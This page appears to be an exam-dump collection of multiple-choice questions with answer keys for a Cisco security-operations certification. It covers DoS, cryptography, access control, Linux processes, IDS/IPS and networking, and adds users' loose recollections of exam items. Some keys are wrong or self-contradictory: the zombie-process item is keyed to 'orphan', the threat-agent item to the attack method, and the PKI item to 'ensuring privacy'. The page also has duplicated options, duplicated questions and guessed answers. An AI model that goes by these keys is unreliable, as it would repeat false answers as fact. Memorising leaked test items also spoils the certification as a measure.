Which statement about the difference between a denial.of.

service attack and a distributed

denial.of service attack is true?

05/27/2018 – by Mod_GuideK 0

Which statement about the difference between a denial.of.service attack and a distributed
denial.of service attack is true?
A. dos attacks only use flooding to compromise a network, and DDOS attacks m=only use
other methods?
B. Dos attacks are launched from one host, and DDOS attacks are lunched from multiple
hosts.
C. Dos attacks are lunched from one host, and DDOS attacks are lunched from multiple
hosts
D. DDos attacks are lunched from one host, and DOS attacks are lunched from multiple
hosts
E. Dos attacks and DDOS attacks have no differences

HIDE ANSWERS
Correct Answer: B

Which purpose can Windows management instrumentation be used?

05/27/2018 – by Mod_GuideK 1

For which purpose can Windows management instrumentation be used?

A. Remote viewing of a computer
B. Remote blocking of malware on a computer
C. Remote reboot of a computer
D. Remote start of a computer

HIDE ANSWERS
Correct Answer: A -------- C (from Microsoft website)

Which international standard is for general risk management, including the principles and
guidelines for managing risk?

05/27/2018 – by Mod_GuideK 2

Which international standard is for general risk management, including the principles and
guidelines for managing risk?
A. ISO 27001
B. ISO 27005
C. ISP 31000
D. ISO 27002

HIDE ANSWERS
Correct Answer: C (ISO 31000)

Which process continues to be recorded in the process table after it has ended and the
status is returned to the parent?

05/27/2018 – by Mod_GuideK 3

Which process continues to be recorded in the process table after it has ended and the status is
returned to the parent?
A. daemon
B. zombie
C. orphan
D. child

HIDE ANSWERS
Correct Answer: C (B by some people as zombie process suits ???)

Which kind of attack does an attacker use known information in encrypted files to break
the encryption scheme for the rest of A. known.plaintext

05/27/2018 – by Mod_GuideK 0

For which kind of attack does an attacker use known information in encrypted files to break the
encryption scheme for the rest of A. known.plaintext
B. known.ciphertext
C. unknown key
D. man in the middle

HIDE ANSWERS
Correct Answer: A

Which technology is network level encrypted not natively incorporated?

05/27/2018 – by Mod_GuideK 0

In which technology is network level encrypted not natively incorporated?

A. Kerberos
B. ssl
C. tls
D. IPsec

HIDE ANSWERS
Correct Answer: A
Which purpose of command and control for network aware malware is true?

05/27/2018 – by Mod_GuideK 0

Which purpose of command and control for network aware malware is true?
A. It helps the malware to profile the host
B. It takes over the user account
C. It contacts a remote server for command and updates
D. It controls and down services on the infected host

HIDE ANSWERS
Correct Answer: C

Which action is an attacker taking when they attempt to gain root access on the victims
system?

05/27/2018 – by Mod_GuideK 0

Which action is an attacker taking when they attempt to gain root access on the victims system?
A. privilege escalation
B. command injections
C. root kit
D. command and control

HIDE ANSWERS
Correct Answer: A

Which vulnerability is an example of Shellshock?

05/27/2018 – by Mod_GuideK 0

Which vulnerability is an example of Shellshock?

A. SQL injection
B. heap Overflow
C. cross site scripting
D. command injection

HIDE ANSWERS
Correct Answer: D

What type of algorithm uses the same key to encrypt and decrypt data?

05/27/2018 – by Mod_GuideK 0

What type of algorithm uses the same key to encrypt and decrypt data?
A. a symmetric algorithm
B. an asymetric algorithm
C. a Public Key infrastructure algorithm
D. an IP Security algorithm

HIDE ANSWERS
Correct Answer: A

Which actions can a promiscuous IPS take to mitigate an attack?

05/27/2018 – by Mod_GuideK 0

Which actions can a promiscuous IPS take to mitigate an attack?

A. modifying packets
B. requesting connection blocking
C. denying packets
D. resetting the TCP connection
E. requesting host blocking
F. denying frames

HIDE ANSWERS
Correct Answer: BDE

Which Statement about personal firewalls is true?

05/27/2018 – by Mod_GuideK 0

Which Statement about personal firewalls is true?

A. They are resilient against kernal attacks
B. They can protect email messages and private documents in a similar way to a VPN
C. They can protect the network against attacks
D. They can protect a system by denying probing requests

HIDE ANSWERS
Correct Answer: D

Which three statements about host-based IPS are true?

05/27/2018 – by Mod_GuideK 0

Which three statements about host-based IPS are true? (Choose three)
A. It can view encrypted files
B. It can be deployed at the perimeter
C. It uses signature-based policies
D. It can have more restrictive policies than network-based IPS
E. It works with deployed firewalls
F. It can generate alerts based on behavior at the desktop level.
HIDE ANSWERS
Correct Answer: ADF

What is a possible result of this activity?

05/27/2018 – by Mod_GuideK 0

An attacker installs a rogue switch that sends superior BPDUs on your network.
What is a possible result of this activity?
A. The switch could offer fake DHCP addresses.
B. The switch could become the root bridge.
C. The switch could be allowed to join the VTP domain
D. The switch could become a transparent bridge.

HIDE ANSWERS
Correct Answer: B

Which reason is true?

05/27/2018 – by Mod_GuideK 0

You get an alert on your desktop computer showing that an attack was successful on the host but
up on investigation you see that occurred duration the attack.
Which reason is true?
A. The computer has HIDS installed on it
B. The computer has NIDS installed on it
C. The computer has HIPS installed on it
D. The computer has NIPS installed on it

HIDE ANSWERS
Correct Answer: A

Where are configuration records stored?

05/27/2018 – by Mod_GuideK 0

Where are configuration records stored?

A. In a CMDB
B. In a MySQL DB
C. In a XLS file
D. There is no need to store them

HIDE ANSWERS
Correct Answer: A
Which of the following is true about heuristic-based algorithms?

05/27/2018 – by Mod_GuideK 0

Which of the following is true about heuristic-based algorithms?

A. Heuristic-based algorithms may require fine tuning to adapt to network traffic and
minimize the possibility of false positives.
B. Heuristic-based algorithms do not require fine tuning.
C. Heuristic-based algorithms support advanced malware protection.
D. Heuristic-based algorithms provide capabilities for the automation of IPS signature
creation and tuning.

HIDE ANSWERS
Correct Answer: A

How many broadcast domains are created if three hosts are connected to a Layer 2 switch
in full-duplex mode?

05/27/2018 – by Mod_GuideK 0

How many broadcast domains are created if three hosts are connected to a Layer 2 switch in full-
duplex mode?
A. 4
B. 3
C. None
D. 1

HIDE ANSWERS
Correct Answer: D

What is one of the advantages of the mandatory access control (MAC) model?

05/27/2018 – by Mod_GuideK 0

What is one of the advantages of the mandatory access control (MAC) model?
A. Stricter control over the information access.
B. Easy and scalable.
C. The owner can decide whom to grant access to.
D. Complex to administer.

HIDE ANSWERS
Correct Answer: A

What is the subject location considered?

05/27/2018 – by Mod_GuideK 0
According to the attribute-based access control (ABAC) model, what is the subject location
considered?
A. Part of the environmental attributes
B. Part of the object attributes
C. Part of the access control attributes
D. None of the above

HIDE ANSWERS
Correct Answer: A

Which case should an employee return his laptop to the organization?

05/27/2018 – by Mod_GuideK 0

In which case should an employee return his laptop to the organization?

A. When moving to a different role
B. Upon termination of the employment
C. As described in the asset return policy
D. When the laptop is end of lease

HIDE ANSWERS
Correct Answer: C

Which of the following are metrics that can measure the effectiveness of a runbook?

05/27/2018 – by Mod_GuideK 0

Which of the following are metrics that can measure the effectiveness of a runbook?
A. Mean time to repair (MTTR)
B. Mean time between failures (MTBF)
C. Mean time to discover a security incident
D. All of the above

HIDE ANSWERS
Correct Answer: D

Which of the following are metrics that can measure the effectiveness of a runbook?

05/27/2018 – by Mod_GuideK 0

Which of the following are metrics that can measure the effectiveness of a runbook?
A. Mean time to repair (MTTR)
B. Mean time between failures (MTBF)
C. Mean time to discover a security incident
D. All of the above

HIDE ANSWERS
Correct Answer: D

Which of the following elements within a packet?

05/27/2018 – by Mod_GuideK 0

Stateful and traditional firewalls can analyze packets and judge them against a set of
predetermined rules called access control lists (ACLs).
They inspect which of the following elements within a packet? (Choose Two)
A. Session headers
B. NetFlow flow information
C. Source and destination ports and source and destination IP addresses
D. Protocol information

HIDE ANSWERS
Correct Answer: CD

Which of the following are Cisco cloud security solutions?

05/27/2018 – by Mod_GuideK 0

Which of the following are Cisco cloud security solutions?

A. CloudDLP
B. OpenDNS
C. CloudLock
D. CloudSLS

HIDE ANSWERS
Correct Answer: BC

What is a trunk link used for?

05/27/2018 – by Mod_GuideK 0

What is a trunk link used for?

A. To pass multiple virtual LANs
B. To connect more than two switches
C. To enable Spanning Tree Protocol
D. To encapsulate Layer 2 frames
HIDE ANSWERS
Correct Answer: A

Which OSI layer does a router typically operate?

05/27/2018 – by Mod_GuideK 0

At which OSI layer does a router typically operate?

A. Transport
B. Network
C. Data link
D. Application

HIDE ANSWERS
Correct Answer: B

Which devices?

05/27/2018 – by Mod_GuideK 0

Cisco pxGrid has a unified framework with an open API designed In a hub-and-spoke
architecture. pxGrid is used to enable the sharing of contextual-based Information from which
devices?
A. From a Cisco ASA to the Cisco OpenDNS service
B. From a Cisco ASA to the Cisco WSA
C. From a Cisco ASA to the Cisco FMC
D. From a Cisco ISE session directory to other policy network systems, such as Cisco IOS
devices and the Cisco ASA

HIDE ANSWERS
Correct Answer: D

What are the advantages of a full-duplex transmission mode compared to half-duplex

mode?

05/27/2018 – by Mod_GuideK 0

What are the advantages of a full-duplex transmission mode compared to half-duplex mode?
(Select all that apply.)
A. Each station can transmit and receive at the same time.
B. It avoids collisions.
C. It makes use of backoff time.
D. It uses a collision avoidance algorithm to transmit.
HIDE ANSWERS
Correct Answer: AB

What is PHI?

05/27/2018 – by Mod_GuideK 0

What is PHI?
A. Protected HIPAA information
B. Protected health information
C. Personal health information
D. Personal human information

HIDE ANSWERS
Correct Answer: B

Drag and Drop

08/09/2017 – by Mod_GuideK 23

Drag and Drop

Drag the data source on the left to the left to the correct data type on the right.
Select and Place:

HIDE ANSWERS
Correct Answer:
what does the v509v3 indicatess to? ( i remember the choices choose 3)
a.publice key of the certificate
b.private key of the certificate
c.subject of the certificate

d.(cant remember the two)

what is a heartbleed attack?

a.)command injection

b.) buffer overlow

c.)i dont know

d.) i cant remmber

how can you correlacte ntp in a accurate time something

a.) asynchronous

b.) get time from each network device

c.)get from ad/ domain controller

d.)synchronous time
what access control is from the root administrator far as i remember the choices is
1.)mandatory

b.)discressionary

c) least priviledge

d.) RBAC

The FMC can share HTML, PDF and CSV data type that relate to a specific event type data.
Which specific event type data?
A. Connection
B. Host
C. Netflow
D. Intrusion
Answer: D

Which of the following are metrics that can measure the effectiveness of a runbook?
A. Mean time to repair (MTTR)
B. Mean time between failures (MTBF)
C. Mean time to discover a security incident
D. All of the above
Answer: D

In which case should an employee return his laptop to the organization?

A. When moving to a different role
B. Upon termination of the employment
C. As described in the asset return policy
D. When the laptop is end of lease
Answer: C

What are the advantages of a full-duplex transmission mode compared to half-duplex mode?
(Select all that apply.)
A. Each station can transmit and receive at the same time.
B. It avoids collisions.
C. It makes use of backoff time.
D. It uses a collision avoidance algorithm to transmit.
Answer: AB

Stateful and traditional firewalls can analyze packets and judge them against a set of
predetermined rules called access control lists (ACLs).
They inspect which of the following elements within a packet? (Choose Two)
A. Session headers
B. NetFlow flow information
C. Source and destination ports and source and destination IP addresses
D. Protocol information
Answer: CD
Cisco pxGrid has a unified framework with an open API designed in a hub-and-spoke
architecture. pxGrid is used to enable the sharing of contextual-based information from which
devices?
A. From a Cisco ASA to the Cisco OpenDNS service
B. From a Cisco ASA to the Cisco WSA
C. From a Cisco ASA to the Cisco FMC
D. From a Cisco ISE session directory to other policy network systems, such as Cisco IOS
devices
and the Cisco ASA

For which purpose can Windows management instrumentation be used?

A. Remote viewing of a computer
B. Remote blocking of malware on a computer
C. Remote reboot of a computer
D. Remote start of a computer
Answer: A

Which international standard is for general risk management, including the principles and
guideline for managing risk?
A. ISO 31000
B. ISO 27001
C. ISO 27005
D. ISO 27002
Answer: A

Which statement about the difference between a denial-of-service attack and a distributed denial
of service attack is true?
A. Dos attack are launched from one host, and DDoS attack are launched from multiple host.
B. DoS attack and DDoS attack have no differences.
C. DDoS attacks are launched from one host, and DoS attacks are launched from multiple host.
D. Dos attack only use flooding to compromise a network, and DDoS attacks only use other
methods.
Answer: A

You discover that a foreign government hacked one of the defense contractors in your country
and stole intellectual property. In this situation, which option is considered the threat agent?
A. method in which the hack occurred
B. defense contractor that stored the intellectual property
C. intellectual property that was stolen
D. foreign government that conducted the attack
Answer: A

After a large influx of network traffic to externally facing devices, you begin investigating what
appear to be a denial of service attack. When you review packets capture data, you notice that the
traffic is a single SYN packet to each port. Which kind of attack is this?
A. SYN flood.
B. Host profiling.
C. Traffic fragmentation.
D. Port scanning.
Answer: D

Which definition of common event format is terms of a security information and event
management solution is true?
A. A type of event log used to identify a successful user login.
B. A TCP network media protocol.
C. Event log analysis certificate that stands for certified event forensics.
D. A standard log event format that is used for log collection.
Answer: D

Which definition of a Linux daemon is true?

A. Process that is causing harm to the system by either using up system resources or causing a
critical crash.
B. Long – running process that is the child at the init process.
C. Process that has no parent process.
D. Process that is starved at the CPU.
Answer: B

Which term describes reasonable effort that must be made to obtain relevant information to
facilitate appropriate courses of action?
A. Due diligence.
B. Ethical behavior.
C. Decision making.
D. Data mining.
Answer: A

According to the common vulnerability scoring system, which term is associated with scoring
multiple vulnerabilities that are exploit in the course of a single attack?
A. chained score
B. risk analysis
C. vulnerability chaining
D. confidentiality
Answer: C

In which format are NetFlow records stored?

A. hexadecimal
B. base 10
C. binary
D. ASCII
Answer: C

Which purpose of Command and Control for network aware malware is true?
A. It contacts a remote server for commands and updates.
B. It controls and shuts down services on the infected host.
C. It helps the malware to profile the host
D. It takes over the user account.
Answer: A

Which of the following access control models use security labels to make access decisions?
A. Discretionary access control (DAC)
B. Mandatory access control (MAC)
C. Role-based access control (RBAC)
D. Identity-based access control (IBAC)
Answer: B

Q).what type of attack is shell shock? i think the answer is command injection since the word
shell is in the name.

– Which format Netflow uses?

Base10
ASCII
Binary
Hexadecimal

– A question about SYN flood. Gives the scenario that using a Full Packet Capture tool, you
notice multiple SYN messages, this is an example of what?
Possible answer: SYN flood

– There was a question about ciphers. The scenario was attacker known some information in the
cipher text of several messages and also knows something about the plaintext that underlies the
cipher-text. (This scenario describes both a Known-plaintext Attack and a Meet-in-the-middle
Attack). Question ask which type ot attack of it.
A possible answer was man-in-the-middle, which is obviously wrong. Leaving Known-plaintext
Attack as the best option.

– Question ask about daemon process.

a processes that detaches themselves from the script that starts them and continue to run in the
background. The answer ended with something like, ‘it is spawned from an parent init process.’

– Question ask about zombie process.

the answer was something like, completed processes that are not yet removed from the kernel’s
process table

– Question about SIEM provide HTML, PDF and CSV format and asked what is it?
(I don’t know what this question means)

– Question said that a foreign government attacks your defense weapons contractor and stole
intellectual property, that foreign government is defined as what?
1) Defense Weapons Contractor who stole intellectual property
2) Foreign government who conduct attack
3) Intellectual property got stolen
4) method used by foreign government to hack
(Don’t sure the correct answer, maybe 2)? Don’t understand very well)

– Question making a statement like Microsoft PPTP used RC4 is stream cipher, what attacks is it
vulnerable to when the same key is used twice.
Cipher-text-only Attack, when an attacker uses cipher text from several messages and tries to
deduce the plaintext or key from just that information, using statistical analysis

– A question about CVSS was how is scoring handled when multiple vulnerabilities are found in
the same attack.
Vulnerability Chaining (While not a formal metric, guidance on scoring multiple vulnerabilities
is provided with Vulnerability Chaining. https://www.first.org/cvss/cvss-v30-
user_guide_v1.1.pdf)

– Several question and/or answers had RFC numbers.

The ones about DNS you really only need to know that DNS queries use UDP port 53 and Zone
transfers used TCP port 53, in the quoted RFCs.
Answer given include UDP 53 and TCP 53

– There was an ISO implementing guidance for general risk management question.
Answer given
ISO 27001 to 27005. This person selected 270002, which he thought is correct after memorizing
the titles for IS0 27001 – 27005

– There was question about what is the command to see every process on the Linux system.
Maybe this answer is ps -ef

– one that asked something like, what event types does FMC record? FMC = Firepower
Management Center

– something similar to, what cryptography is used on Digital Certificates? The answers included:
SHA-256
SHA-512
RSA 4096
I think answers are SHA-256 and SHA-384 if it appears on the answers list.

– SIEM Common Event Format, what is it?

He didn’t remember the exact question but given that syslog message format is used as a
transport mechanism for a Common Event Format, He’d look for something related to that in an
answer.

– A question about what device terminate broadcast domains.

Router is the answer
– A question making a statement like, RC4 is stream cipher, what attacks is it vulnerable to when
the same key is used twice.
Cipher-text-only Attack, when an attacker uses cipher text from several messages and tries to
deduce the plaintext or key from just that information, using statistical analysis

Netflow data type–binary, hexadecimal, base10 or decimal.

Standards helps organizations keep information assets secure- iso 27001
Read about hashing attacks like known plain text, known cypher text, cypher txt only and meet
in the middle.
Read about ps -ef Linux command..
Read about Linux zombie process, parent process, child process, orphan process…
Read about cvss.

Which two features must a next generation firewall include?

08/09/2017 – by Mod_GuideK 4

Which two features must a next generation firewall include? (Choose two.)
A. data mining
B. host-based antivirus
C. application visibility and control
D. Security Information and Event Management
E. intrusion detection system

HIDE ANSWERS
Correct Answer: CE

Which term represents a weakness in a system that could lead to the system being
compromised?

08/09/2017 – by Mod_GuideK 0

Which term represents a weakness in a system that could lead to the system being compromised?
A. vulnerability
B. threat
C. exploit
D. risk

HIDE ANSWERS
Correct Answer: A

Which definition of Windows Registry is true?

08/09/2017 – by Mod_GuideK 2

Which definition of Windows Registry is true?

A. set of pages that are currently resident m physical memory
B. basic unit to which the operating system allocates processor time
C. set of virtual memory addresses
D. database that stores low-level settings for the operating system

HIDE ANSWERS
Correct Answer: D

Which definition of the IIS Log Parser tool is true?

08/09/2017 – by Mod_GuideK 1

Which definition of the IIS Log Parser tool is true?

A. a logging module for IIS that allows you to log to a database
B. a data source control to connect to your data source
C. a powerful, versatile tool that makes it possible to run SQL-like queries against log flies
D. a powerful versatile tool that verifies the integrity of the log files

HIDE ANSWERS
Correct Answer: C

Drag and Drop

08/09/2017 – by Mod_GuideK 5

Drag and Drop

Drag the technology on the left to the data type the technology provides on the right.
Select and Place:
HIDE ANSWERS
Correct Answer:

Which three options are types of Layer 2 network attack?

08/09/2017 – by Mod_GuideK 0

Which three options are types of Layer 2 network attack? (Choose three.)
A. ARP attacks
B. brute force attacks
C. spoofing attacks
D. DDOS attacks
E. VLAN hopping
F. botnet attacks

HIDE ANSWERS
Correct Answer: ACE

How many broadcast domains are present on the router?

08/09/2017 – by Mod_GuideK 0

If a router has four interfaces and each interface is connected to four switches, how many
broadcast domains are present on the router?
A. 1
B. 2
C. 4
D. 8

HIDE ANSWERS
Correct Answer: C

Where does routing occur within the DoD TCP/IP reference model?

08/09/2017 – by Mod_GuideK 0

Where does routing occur within the DoD TCP/IP reference model?
A. application
B. internet
C. network
D. transport

HIDE ANSWERS
Correct Answer: B

Which NTP command configures the local device as an NTP reference clock source?

08/09/2017 – by Mod_GuideK 0

Which NTP command configures the local device as an NTP reference clock source?
A. ntp peer
B. ntp broadcast
C. ntp master
D. ntp server

HIDE ANSWERS
Correct Answer: C

Which technology allows a large number of private IP addresses to be represented by a

smaller number of public IP addresses?

08/09/2017 – by Mod_GuideK 0

Which technology allows a large number of private IP addresses to be represented by a smaller

number of public IP addresses?
A. NAT
B. NTP
C. RFC 1631
D. RFC 1918

HIDE ANSWERS
Correct Answer: A

Which statement about digitally signing a document is true?

08/09/2017 – by Mod_GuideK 1

Which statement about digitally signing a document is true?

A. The document is hashed and then the document is encrypted with the private key.
B. The document is hashed and then the hash is encrypted with the private key.
C. The document is encrypted and then the document is hashed with the public key
D. The document is hashed and then the document is encrypted with the public key.

HIDE ANSWERS
Correct Answer: B

Which reason can HTTPS traffic make security monitoring difficult?

08/09/2017 – by Mod_GuideK 0

For which reason can HTTPS traffic make security monitoring difficult?
A. encryption
B. large packet headers
C. Signature detection takes longer.
D. SSL interception

HIDE ANSWERS
Correct Answer: A
Which directory is commonly used on Linux systems to store log files, including syslog and
apache access logs?

08/09/2017 – by Mod_GuideK 0

Which directory is commonly used on Linux systems to store log files, including syslog and
apache access logs?
A. /etc/log
B. /root/log
C. /lib/log
D. /var/log

HIDE ANSWERS
Correct Answer: D

Which encryption algorithm is the strongest?

08/09/2017 – by Mod_GuideK 1

Which encryption algorithm is the strongest?

A. AES
B. CES
C. DES
D. 3DES

HIDE ANSWERS
Correct Answer: A

Which protocol maps IP network addresses to MAC hardware addresses so that IP packets
can be sent across networks?

08/09/2017 – by Mod_GuideK 0

Which protocol maps IP network addresses to MAC hardware addresses so that IP packets can
be sent across networks?
A. Internet Control Message Protocol
B. Address Resolution Protocol
C. Session Initiation Protocol
D. Transmission Control Protocol/Internet Protocol

HIDE ANSWERS
Correct Answer: B

Which definition of the virtual address space for a Windows process is true?
08/09/2017 – by Mod_GuideK 1

Which definition of the virtual address space for a Windows process is true?
A. actual physical location of an object in memory
B. set of virtual memory addresses that it can use
C. set of pages that are currently resident in physical memory
D. system-level memory protection feature that is built into the operating system

HIDE ANSWERS
Correct Answer: B

Which information security property is supported by encryption?

08/09/2017 – by Mod_GuideK 0

Which information security property is supported by encryption?

A. sustainability
B. integrity
C. confidentiality
D. availability

HIDE ANSWERS
Correct Answer: C

Which situation indicates application-level white listing?

08/09/2017 – by Mod_GuideK 11

Which situation indicates application-level white listing?

A. Allow everything and deny specific executable files.
B. Allow specific executable files and deny specific executable files.
C. Writing current application attacks on a whiteboard daily.
D. Allow specific files and deny everything else.

HIDE ANSWERS
Correct Answer: D

Which attack method is it vulnerable?

08/09/2017 – by Mod_GuideK 1

If a web server accepts input from the user and passes it to a bash shell, to which attack method
is it vulnerable?
A. input validation
B. hash collision
C. command injection
D. integer overflow

HIDE ANSWERS
Correct Answer: C

Which definition describes the main purpose of a Security Information and Event
Management solution ?

08/09/2017 – by Mod_GuideK 0

Which definition describes the main purpose of a Security Information and Event Management
solution ?
A. a database that collects and categorizes indicators of compromise to evaluate and search
for potential security threats
B. a monitoring interface that manages firewall access control lists for duplicate firewall
filtering
C. a relay server or device that collects then forwards event logs to another log collection
device
D. a security product that collects, normalizes, and correlates event log data to provide
holistic views of the security posture

HIDE ANSWERS
Correct Answer: D

Which option is a purpose of port scanning?

08/09/2017 – by Mod_GuideK 0

Which option is a purpose of port scanning?

A. Identify the Internet Protocol of the target system.
B. Determine if the network is up or down
C. Identify which ports and services are open on the target host.
D. Identify legitimate users of a system.

HIDE ANSWERS
Correct Answer: C

Which transport protocol is recommended for use with DNS queries?

08/09/2017 – by Mod_GuideK 4

According to RFC 1035 which transport protocol is recommended for use with DNS queries?
A. Transmission Control Protocol
B. Reliable Data Protocol
C. Hypertext Transfer Protocol
D. User Datagram Protocol

HIDE ANSWERS
Correct Answer: D

What does CIA mean in this context?

08/09/2017 – by Mod_GuideK 0

One of the objectives of information security is to protect the CIA of information and systems.
What does CIA mean in this context?
A. Confidentiality, Integrity, and Availability
B. Confidentiality, Identity, and Availability
C. Confidentiality, Integrity, and Authorization
D. Confidentiality, Identity, and Authorization

HIDE ANSWERS
Correct Answer: A

Which term represents the practice of giving employees only those permissions necessary to
perform their specific role within an organization?

08/09/2017 – by Mod_GuideK 1

Which term represents the practice of giving employees only those permissions necessary to
perform their specific role within an organization?
A. integrity validation
B. due diligence
C. need to know
D. least privilege

HIDE ANSWERS
Correct Answer: D

Which term represents the chronological record of how evidence was collected- analyzed,
preserved, and transferred?

08/09/2017 – by Mod_GuideK 0

Which term represents the chronological record of how evidence was collected- analyzed,
preserved, and transferred?
A. chain of evidence
B. evidence chronology
C. chain of custody
D. record of safekeeping
HIDE ANSWERS
Correct Answer: C

Which two tasks can be performed by analyzing the logs of a traditional stateful firewall?

08/09/2017 – by Mod_GuideK 9

Which two tasks can be performed by analyzing the logs of a traditional stateful firewall?
(Choose two.)
A. Confirm the timing of network connections differentiated by the TCP 5-tuple
B. Audit the applications used within a social networking web site.
C. Determine the user IDs involved in an instant messaging exchange.
D. Map internal private IP addresses to dynamically translated external public IP
addresses
E. Identify the malware variant carried by ^n SMTP connection

HIDE ANSWERS
Correct Answer: AD (BE ???)

Which security monitoring data type is associated with application server logs?

08/09/2017 – by Mod_GuideK 0

Which security monitoring data type is associated with application server logs?
A. alert data
B. statistical data
C. session data
D. transaction data

HIDE ANSWERS
Correct Answer: D

Where is a host-based intrusion detection system located?

08/09/2017 – by Mod_GuideK 0

Where is a host-based intrusion detection system located?

A. on a particular end-point as an agent or a desktop application
B. on a dedicated proxy server monitoring egress traffic
C. on a span switch port
D. on a tap switch port

HIDE ANSWERS
Correct Answer: A

Which hash algorithm is the weakest?

08/09/2017 – by Mod_GuideK 0

Which hash algorithm is the weakest?

A. SHA-512
B. RSA 4096
C. SHA-1
D. SHA-256

HIDE ANSWERS
Correct Answer: C

Which problem is a possible explanation of this situation?

08/09/2017 – by Mod_GuideK 3

A user reports difficulties accessing certain external web pages, When examining traffic to and
from the external domain in full packet captures, you notice many SYNs that have the same
sequence number, source, and destination IP address, but have different payloads. Which
problem is a possible explanation of this situation?
A. insufficient network resources
B. failure of full packet capture solution
C. misconfiguration of web filter
D. TCP injection

HIDE ANSWERS
Correct Answer: D

Which tool is commonly used by threat actors on a webpage to take advantage of the
softwarevulnerabilitiesof a system to spread malware?

08/09/2017 – by Mod_GuideK 0

Which tool is commonly used by threat actors on a webpage to take advantage of the
softwarevulnerabilitiesof a system to spread malware?
A. exploit kit
B. root kit
C. vulnerability kit
D. script kiddie kit

HIDE ANSWERS
Correct Answer: A

Which files contain the same content?

08/09/2017 – by Mod_GuideK 0
Refer to the exhibit. During an analysis this list of email attachments is found. Which files
contain the same content?

A. 1 and 4
B. 3 and 4
C. 1 and 3
D. 1 and 2

HIDE ANSWERS
Correct Answer: C

Which network device is used to separate broadcast domains?

08/09/2017 – by Mod_GuideK 0

Which network device is used to separate broadcast domains?

A. router
B. repeater
C. switch
D. bridge

HIDE ANSWERS
Correct Answer: A

Which statement does the discretionary access control security model grant or restrict
access ?

08/09/2017 – by Mod_GuideK 5

Based on which statement does the discretionary access control security model grant or restrict
access ?
A. discretion of the system administrator
B. security policy defined by the owner of an object
C. security policy defined by the system administrator
D. role of a user within an organization

HIDE ANSWERS
Correct Answer: B
Which cryptographic key is contained in an X.509 certificate?

08/09/2017 – by Mod_GuideK 1

Which cryptographic key is contained in an X.509 certificate?

A. symmetric
B. public
C. private
D. asymmetric

HIDE ANSWERS
Correct Answer: B

Which two activities are examples of social engineering?

08/09/2017 – by Mod_GuideK 9

Which two activities are examples of social engineering? (Choose two)

A. receiving call from the IT department asking you to verify your username/password to
maintain the account
B. receiving an invite to your department’s weekly WebEx meeting
C. sending a verbal request to an administrator to change the password to the account of a
user the administrator does know
D. receiving an email from MR requesting that you visit the secure HR website and update
your contract information
E. receiving an unexpected email from an unknown person with an uncharacteristic
attachment from someone in the same company

HIDE ANSWERS
Correct Answer: AD

Which definition of a fork in Linux is true?

08/09/2017 – by Mod_GuideK 1

Which definition of a fork in Linux is true?

A. daemon to execute scheduled commands
B. parent directory name of a file pathname
C. macros for manipulating CPU sets
D. new process created by a parent process

HIDE ANSWERS
Correct Answer: D (C???)
Which two actions are valid uses of public key infrastructure?

08/09/2017 – by Mod_GuideK 8

Which two actions are valid uses of public key infrastructure? (Choose two )
A. ensuring the privacy of a certificate
B. revoking the validation of a certificate
C. validating the authenticity of a certificate
D. creating duplicate copies of a certificate
E. changing ownership of a certificate

HIDE ANSWERS
Correct Answer: AC (BC ??)

Which two terms are types of cross site scripting attacks?

08/09/2017 – by Mod_GuideK 0

Which two terms are types of cross site scripting attacks? (Choose two )
A. directed
B. encoded
C. stored
D. reflected
E. cascaded

HIDE ANSWERS
Correct Answer: CD

Which type of attack occurs when an attacker utilizes a botnet to reflect requests off an
NTP server to overwhelm their target?

08/09/2017 – by Mod_GuideK 1

Which type of attack occurs when an attacker utilizes a botnet to reflect requests off an NTP
server to overwhelm their target?
A. man in the middle
B. denial of service
C. distributed denial of service
D. replay

HIDE ANSWERS
Correct Answer: C
Which flags indicate that an HTTP connection was stopped by a security appliance, like a
firewall, before it could be built fully?

08/09/2017 – by Mod_GuideK 2

In NetFlow records, which flags indicate that an HTTP connection was stopped by a security
appliance, like a firewall, before it could be built fully?
A. ACK
B. SYN ACK
C. RST
D. PSH, ACK

HIDE ANSWERS
Correct Answer: C

Which definition of an antivirus program is true?

08/09/2017 – by Mod_GuideK 0

Which definition of an antivirus program is true?

A. program used to detect and remove unwanted malicious software from the system
B. program that provides real time analysis of security alerts generated by network
hardware and application
C. program that scans a running application for vulnerabilities
D. rules that allow network traffic to go in and out

HIDE ANSWERS
Correct Answer: A

Which type of attack occurs when an attacker is successful in eavesdropping on a

conversation between two IPS phones?

08/09/2017 – by Mod_GuideK 0

Which type of attack occurs when an attacker is successful in eavesdropping on a conversation

between two IPS phones?
A. replay
B. man-in-the-middle
C. dictionary
D. known-plaintext

HIDE ANSWERS
Correct Answer: B
Which evasion technique does this attempt indicate?

08/09/2017 – by Mod_GuideK 4

An intrusion detection system begins receiving an abnormally high volume of scanning from
numerous sources. Which evasion technique does this attempt indicate?
A. traffic fragmentation
B. resource exhaustion
C. timing attack
D. tunneling

HIDE ANSWERS
Correct Answer: B (A ???)

While viewing packet capture data, you notice that one IP is sending and receiving traffic
for multiple devices by modifying the IP header, Which option is making this behavior
possible?

08/09/2017 – by Mod_GuideK 0

While viewing packet capture data, you notice that one IP is sending and receiving traffic for
multiple devices by modifying the IP header, Which option is making this behavior possible?
A. TOR
B. NAT
C. encapsulation
D. tunneling

HIDE ANSWERS
Correct Answer: B

Which layer?

08/09/2017 – by Mod_GuideK 0

A firewall requires deep packet inspection to evaluate which layer?

A. application
B. Internet
C. link
D. transport

HIDE ANSWERS
Correct Answer: A
Which two protocols are used for email (Choose two )

08/09/2017 – by Mod_GuideK 0

Which two protocols are used for email (Choose two )

A. NTP
B. DNS
C. HTTP
D. IMAP
E. SMTP

HIDE ANSWERS
Correct Answer: DE

Which two options are recognized forms of phishing?

08/09/2017 – by Mod_GuideK 0

Which two options are recognized forms of phishing? (Choose two )

A. spear
B. whaling
C. mailbomb
D. hooking
E. mailnet

HIDE ANSWERS
Correct Answer: AB

Which security monitoring data type requires the most storage space?

08/09/2017 – by Mod_GuideK 1

Which security monitoring data type requires the most storage space?
A. full packet capture
B. transaction data
C. statistical data
D. session data

HIDE ANSWERS
Correct Answer: A

Which type of exploit normally requires the culprit to have prior access to the target
system?
08/09/2017 – by Mod_GuideK 1

Which type of exploit normally requires the culprit to have prior access to the target system?
A. local exploit
B. denial of service
C. system vulnerability
D. remote exploit

HIDE ANSWERS
Correct Answer: A

Which identifier is used to describe the application or process that submitted a log
message?

08/09/2017 – by Mod_GuideK 1

Which identifier is used to describe the application or process that submitted a log message?
A. action
B. selector
C. priority
D. facility

HIDE ANSWERS
Correct Answer: D

Which concern is important when monitoring NTP servers for abnormal levels of traffic?

08/09/2017 – by Mod_GuideK 5

Which concern is important when monitoring NTP servers for abnormal levels of traffic?
